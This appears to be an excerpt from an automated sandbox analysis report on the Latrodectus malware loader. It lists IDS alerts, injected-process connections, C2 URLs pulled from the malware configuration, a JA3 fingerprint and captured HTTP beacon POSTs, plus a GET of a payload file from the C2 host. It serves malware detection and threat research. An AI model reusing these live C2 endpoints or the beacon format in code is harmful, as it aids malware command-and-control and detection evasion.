Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50053 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50046 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50036 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:49997 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50045 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50048 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50040 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50054 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50052 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50050 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50044 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50041 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50047 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.4:50042 -> 104.21.16.251:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 104.21.68.89 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.16.251 443	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 103.57.249.207 6542	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://reateberam.com/test/
Source: Malware configuration extractor	URLs: https://dogirafer.com/test/

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49730 -> 103.57.249.207:6542

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: SITINETWORS-IN-APSITINETWORKSLIMITEDIN SITINETWORS-IN-APSITINETWORKSLIMITEDIN

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49865 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49873 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49885 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49879 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49891 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49904 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49914 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49929 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49934 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49940 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49946 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49953 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49956 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49962 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49967 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49974 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49982 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49988 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49997 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50005 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50013 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50020 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50027 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50032 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50035 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50036 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50037 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50038 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50033 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50034 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50040 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50039 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50042 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50043 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50048 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50045 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50050 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50051 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50041 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50053 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50054 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50055 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50047 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50044 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50049 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50046 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50052 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49891 -> 104.21.16.251:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49914 -> 104.21.16.251:443

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hmdViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 92Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hndViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkdViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hldViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.com
Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.com
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hidViRxTPtzXdZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 360Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hjdViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hgdViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hhdViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hudViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hvdViRxTPtzGAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 12228Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYwqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYwqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYgqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYQqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYAqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZwqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZgqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZQqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnZAqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnawqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnagqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnagqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnagqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkYwqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkYgqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkYQqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkYAqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkZwqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkZgqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
